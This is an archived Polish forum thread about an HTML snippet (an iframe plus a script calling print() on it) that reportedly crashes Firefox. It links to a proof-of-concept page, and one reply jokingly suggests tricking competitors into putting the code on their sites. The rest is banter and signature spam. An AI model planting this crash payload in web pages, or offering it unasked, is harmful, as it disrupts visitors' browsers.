Skocz do zawartości

Wywal sobie Firefoksa


Vek-tor

Rekomendowane odpowiedzi

Wystarczy umieścić specjalnie spreparowany kod html na stronie WWW w sekcji "body", by przeglądarka zakończyła swoje działanie. Błędny kod powodujący zamknięcie przeglądarki:

<iframe id="pocframe" name="pocframe" src="about:blank"</iframe><script type="text/javascript">window.frames.pocframe.print();</script>

można sprawdzić to pod tym adresem https://maas-online.nl/security/poc-mozilla-crash.html (strona próbuje zamknąć przeglądarkę tylko). Mi działa a innym :?:

Wino - to co lubimy najbardziej, a tu opakowania na butelkę 0.75l

Odnośnik do komentarza
Udostępnij na innych stronach

a po co to?

wyslesz maila do konkurecji:

"tajny kod pozycjonerow

proszewstawic to na swoja strone" :D

.... odznaczylo mi nieprzeczytane wiadomosci :evil:

Sprzedam IPHONE 13PRO MAX stan używany sprzedam iphone

praca za granicą, ogłoszenia sprawdzonych pracodawców: praca za granicą
dieta ketogeniczna, przepisy ketogeniczne? Jak wywołać stan ketozy dieta ketogeniczna

Odnośnik do komentarza
Udostępnij na innych stronach

Wywal sobie Firefoksa

Wystarczy umieścić specjalnie spreparowany kod html na stronie WWW w sekcji "body", by przeglądarka zakończyła swoje działanie. Błędny kod powodujący zamknięcie przeglądarki:

Równie dobrze możecie sobie wywalić wszystkie przeglądarki dostępne na rynku...

Wniosek - nie przeglądaj stron www #-o :D

Live Free or Die

Odnośnik do komentarza
Udostępnij na innych stronach

mi to nie wywala IE i Avat Browsera nakładki na IE.

Nie wywala, bo to kod "przeznaczony" tylko dla FF.

Mi chodziło o to, że są również dostępne dla script kiddies również inne sztuczki, by wywalić tak praktycznie każdą przeglądarke

Live Free or Die

Odnośnik do komentarza
Udostępnij na innych stronach

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę. Warunki użytkowania Polityka prywatności